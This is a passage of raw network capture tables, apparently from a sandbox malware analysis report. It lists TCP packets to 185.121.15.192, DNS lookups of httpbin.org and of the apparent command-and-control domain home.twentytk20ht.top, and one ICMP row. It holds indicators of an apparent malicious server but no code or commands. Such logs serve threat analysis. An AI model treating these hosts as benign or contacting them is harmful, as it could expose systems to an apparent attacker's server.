Dec 20, 2024 16:13:08.918028116 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918041945 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918077946 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918179989 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918194056 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918205023 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918304920 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918318987 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918378115 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918391943 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918404102 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918495893 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918509007 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918521881 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918580055 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918592930 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918818951 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918833017 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918847084 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918860912 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.918875933 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919023037 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919035912 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919049978 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919063091 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919075012 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919090986 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919104099 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919260025 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919281960 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919295073 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919306040 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919329882 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919342995 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919461966 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919475079 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919487000 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919500113 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919513941 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919621944 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919635057 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919648886 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919661999 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919760942 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919775009 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919786930 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.919949055 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.920025110 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.920037031 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.920052052 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.920255899 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.923912048 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.927572012 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:09.035928011 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036015987 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036034107 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036060095 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036159992 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036184072 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036201954 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036344051 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036358118 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036371946 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036489964 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036504030 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036516905 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036529064 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036542892 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036547899 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036562920 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036576033 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036588907 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036602974 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036626101 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.036638975 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037084103 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037103891 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037116051 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037127972 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037139893 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037153959 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037167072 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037179947 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037244081 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037267923 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037283897 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037399054 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037419081 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037431002 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037446022 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037458897 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037472010 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037486076 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037499905 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037506104 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037519932 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037554026 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037573099 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037597895 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037611008 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037616014 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037641048 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037739992 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037759066 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037939072 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037951946 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.037966013 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051282883 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051578999 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051601887 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051615953 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051632881 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051719904 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051733971 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051747084 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051764011 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051778078 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051888943 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051903009 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051918030 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051932096 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051945925 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.051959038 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052015066 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052027941 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052041054 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052175045 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052189112 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052201033 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052215099 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.052227020 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.053291082 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.053304911 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.053320885 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.053335905 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:09.053349972 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:39.725886106 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:39.725955963 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:39.726507902 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:39.846393108 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.058131933 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.178426027 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.178534031 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.179096937 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.298902988 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.298918009 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.298926115 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.298934937 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.298945904 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.298970938 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.299027920 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.299037933 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.299093008 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.299376011 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.299386978 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.299393892 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.299434900 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.418730021 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.418752909 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.418761969 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.418803930 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.418864012 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.419447899 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.419459105 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.419467926 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.419527054 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.460769892 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.460881948 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.580648899 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.580748081 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.624861956 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.624979973 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:40.745556116 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.832730055 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:40.834007025 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.084719896 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.084793091 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.168258905 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.172487020 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.172590971 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.206753969 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.208336115 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.292742014 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.292804956 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.292809010 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.292818069 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.292936087 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.292975903 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.292990923 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.292999983 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293009043 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293035030 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.293061018 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.293103933 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293113947 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293123007 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293132067 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293152094 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293245077 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.293325901 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293375969 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.293396950 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293406963 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293446064 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.293473959 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293638945 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293921947 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293934107 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293941975 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.293951035 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294392109 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294400930 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294411898 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294419050 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294428110 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294573069 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294583082 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294589996 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294599056 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294780016 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.294847965 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294857025 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.294904947 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.328166962 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.328238964 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.412553072 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.412616014 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.418701887 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.419329882 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.421580076 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.421650887 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.447911978 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.448014975 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.455035925 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.455456972 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.458450079 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.459075928 CET	49808	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:41.532387972 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.532413960 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.539552927 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.539736032 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.539746046 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.539882898 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.544361115 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.544610977 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.544620037 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.544627905 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.544852018 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.544861078 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545056105 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545067072 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545332909 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545344114 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545433998 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545444012 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545447111 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545455933 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545550108 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545559883 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.545675039 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546294928 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546304941 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546468973 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546478987 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546488047 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546497107 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546505928 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546516895 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546526909 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546535969 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546544075 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546554089 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546564102 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546572924 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546581984 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546591997 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546602011 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546611071 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546643019 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546650887 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546653986 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546664000 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546673059 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546683073 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546690941 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546700954 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546885014 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546894073 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546901941 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.546911001 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.547043085 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.547116041 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.547182083 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.547192097 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.547262907 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.547271967 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.547281027 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.578080893 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:41.578586102 CET	80	49808	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:42.910793066 CET	49814	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:43.031019926 CET	80	49814	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:43.031140089 CET	49814	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:43.031569958 CET	49814	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:43.152010918 CET	80	49814	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:44.310794115 CET	80	49814	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:44.312530994 CET	80	49814	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:44.312602997 CET	49814	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:44.315380096 CET	49814	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:44.435071945 CET	80	49814	185.121.15.192	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:13:03.572026014 CET	52631	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:03.572096109 CET	52631	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:03.810034037 CET	53	52631	1.1.1.1	192.168.2.5
Dec 20, 2024 16:13:04.112868071 CET	53	52631	1.1.1.1	192.168.2.5
Dec 20, 2024 16:13:06.906675100 CET	52634	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:06.906749964 CET	52634	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:07.046106100 CET	53	52634	1.1.1.1	192.168.2.5
Dec 20, 2024 16:13:07.312297106 CET	53	52634	1.1.1.1	192.168.2.5
Dec 20, 2024 16:13:39.919178009 CET	63912	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:39.919235945 CET	63912	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:40.056778908 CET	53	63912	1.1.1.1	192.168.2.5
Dec 20, 2024 16:13:40.056802988 CET	53	63912	1.1.1.1	192.168.2.5
Dec 20, 2024 16:13:42.060971975 CET	62054	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:42.061033964 CET	62054	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:13:42.909445047 CET	53	62054	1.1.1.1	192.168.2.5
Dec 20, 2024 16:13:43.907850027 CET	53	62054	1.1.1.1	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 20, 2024 16:13:43.908027887 CET	192.168.2.5	1.1.1.1	c233	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 16:13:03.572026014 CET	192.168.2.5	1.1.1.1	0xf7cc	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:03.572096109 CET	192.168.2.5	1.1.1.1	0x901a	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 20, 2024 16:13:06.906675100 CET	192.168.2.5	1.1.1.1	0x1ba	Standard query (0)	home.twentytk20ht.top	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:06.906749964 CET	192.168.2.5	1.1.1.1	0x80a7	Standard query (0)	home.twentytk20ht.top	28	IN (0x0001)	false
Dec 20, 2024 16:13:39.919178009 CET	192.168.2.5	1.1.1.1	0xab5b	Standard query (0)	home.twentytk20ht.top	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:39.919235945 CET	192.168.2.5	1.1.1.1	0xdd56	Standard query (0)	home.twentytk20ht.top	28	IN (0x0001)	false
